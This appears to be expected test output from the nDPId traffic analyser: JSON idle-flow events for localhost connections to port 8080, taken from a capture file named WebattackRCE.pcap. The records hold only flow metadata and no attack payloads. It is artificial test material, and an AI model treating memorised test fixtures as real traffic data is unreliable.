+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 